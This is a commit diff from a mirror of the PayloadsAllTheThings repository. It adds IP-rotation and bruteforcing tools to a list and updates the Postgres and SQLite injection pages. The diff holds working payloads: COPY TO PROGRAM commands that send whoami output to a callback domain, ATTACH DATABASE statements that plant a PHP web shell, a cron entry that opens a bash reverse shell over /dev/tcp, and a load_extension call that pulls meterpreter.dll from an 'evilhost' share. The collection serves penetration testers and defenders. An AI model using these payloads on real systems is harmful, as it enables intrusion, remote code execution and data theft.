mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-09 02:14:57 +01:00
SQLite extensions
This commit is contained in:
Swissky
parent
ca50df2336
commit
ba62eed782
3 changed files with 47 additions and 6 deletions
|
|
@ -14,6 +14,7 @@
|
|||
|
||||
## Tools
|
||||
|
||||
* [ZephrFish/OmniProx](https://github.com/ZephrFish/OmniProx) - IP Rotation from different providers - Like FireProx but for GCP, Azure, Alibaba and CloudFlare.
|
||||
* [ddd/gpb](https://github.com/ddd/gpb) - Bruteforcing the phone number of any Google user while rotating IPv6 addresses.
|
||||
* [ffuf/ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go.
|
||||
* [PortSwigger/Burp Suite](https://portswigger.net/burp) - The class-leading vulnerability scanning, penetration testing, and web app security platform.
|
||||
|
|
@ -143,3 +144,4 @@ Many cloud providers, such as Vultr, offer /64 IPv6 ranges, which provide a vast
|
|||
* [Bruteforcing the phone number of any Google user - brutecat - June 9, 2025](https://brutecat.com/articles/leaking-google-phones)
|
||||
* [Burp Intruder attack types - PortSwigger - August 19, 2025](https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/attack-types)
|
||||
* [Detecting and annoying Burp users - Julien Voisin - May 3, 2021](https://dustri.org/b/detecting-and-annoying-burp-users.html)
|
||||
* [OmniProx: Multi-Cloud IP Rotation Made Simple - Andy Gill - September 28, 2025](https://blog.zsec.uk/omniprox/)
|
||||
|
|
|
|||
|
|
@ -236,7 +236,8 @@ NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_fil
|
|||
Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with '`pg_execute_server_program`' to pipe to and from an external program using `COPY`.
|
||||
|
||||
```sql
|
||||
COPY (SELECT '') to PROGRAM 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
|
||||
COPY (SELECT '') TO PROGRAM 'getent hosts $(whoami).[BURP_COLLABORATOR_DOMAIN_CALLBACK]';
|
||||
COPY (SELECT '') to PROGRAM 'nslookup [BURP_COLLABORATOR_DOMAIN_CALLBACK]'
|
||||
```
|
||||
|
||||
```sql
|
||||
|
|
|
|||
|
|
@ -84,18 +84,56 @@ AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
|
|||
|
||||
### Attach Database
|
||||
|
||||
This snippet shows how an attacker could abuse SQLite's `ATTACH DATABASE` feature to plant a web-shell on a server:
|
||||
|
||||
```sql
|
||||
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
||||
CREATE TABLE lol.pwn (dataz text);
|
||||
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
|
||||
ATTACH DATABASE '/var/www/shell.php' AS shell;
|
||||
CREATE TABLE shell.pwn (dataz text);
|
||||
INSERT INTO shell.pwn (dataz) VALUES ('<?php system($_GET["cmd"]); ?>');--
|
||||
```
|
||||
|
||||
First, it tells SQLite to "treat" a PHP file as a writable SQLite database. Then it creates a table inside that file (which is actually the future web-shell). Finally it writes malicious PHP code into the file.
|
||||
|
||||
**Note:** Using `ATTACH DATABASE` to create a file comes with a drawback: SQLite will prepend its magic header bytes (`5351 4c69 7465 2066 6f72 6d61 7420 3300`, i.e., *"SQLite format 3"*). These bytes will corrupt most server-side scripts, but PHP is unusually tolerant: as long as a `<?php` tag appears anywhere in the file, the interpreter ignores any preceding garbage and executes the embedded code.
|
||||
|
||||
```ps1
|
||||
file shell.php
|
||||
shell.php: SQLite 3.x database, last written using SQLite version 3051000, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2
|
||||
```
|
||||
|
||||
If uploading a PHP web shell isn’t possible but the service runs with root privileges, an attacker can use the same technique to create a cron job that triggers a reverse shell:
|
||||
|
||||
```sql
|
||||
ATTACH DATABASE '/etc/cron.d/pwn.task' AS cron;
|
||||
CREATE TABLE cron.tab (dataz text);
|
||||
INSERT INTO cron.tab (dataz) VALUES (char(10) || '* * * * * root bash -i >& /dev/tcp/127.0.0.1/4242 0>&1' || char(10));--
|
||||
```
|
||||
|
||||
This writes a new cron entry that runs every minute and connects back to the attacker.
|
||||
|
||||
### Load_extension
|
||||
|
||||
:warning: This component is disabled by default.
|
||||
:warning: SQLite's ability to load external shared libraries (extensions) is disabled by default in most environments. When enabled, SQLite can load a compiled module using the `load_extension()` SQL function:
|
||||
|
||||
```sql
|
||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||
SELECT load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||
```
|
||||
|
||||
In the sqlite3 command-line shell you can display runtime configuration with:
|
||||
|
||||
```sql
|
||||
sqlite> .dbconfig
|
||||
load_extension on
|
||||
```
|
||||
|
||||
If you see `load_extension on` (or off), that indicates whether the shell's runtime currently permits loading shared-library extensions.
|
||||
|
||||
A SQLite extension is simply a native shared library,typically a `.so` file on Linux or a `.dll` file on Windows, that exposes a special initialization function. When the extension is loaded, SQLite calls this function to register any new SQL functions, virtual tables, or other features provided by the module.
|
||||
|
||||
To compile a loadable extension on Linux, you can use:
|
||||
|
||||
```ps1
|
||||
gcc -g -fPIC -shared demo.c -o demo.so
|
||||
```
|
||||
|
||||
## SQLite File Manipulation
|
||||
|
|
|
|||
Loading…
Reference in a new issue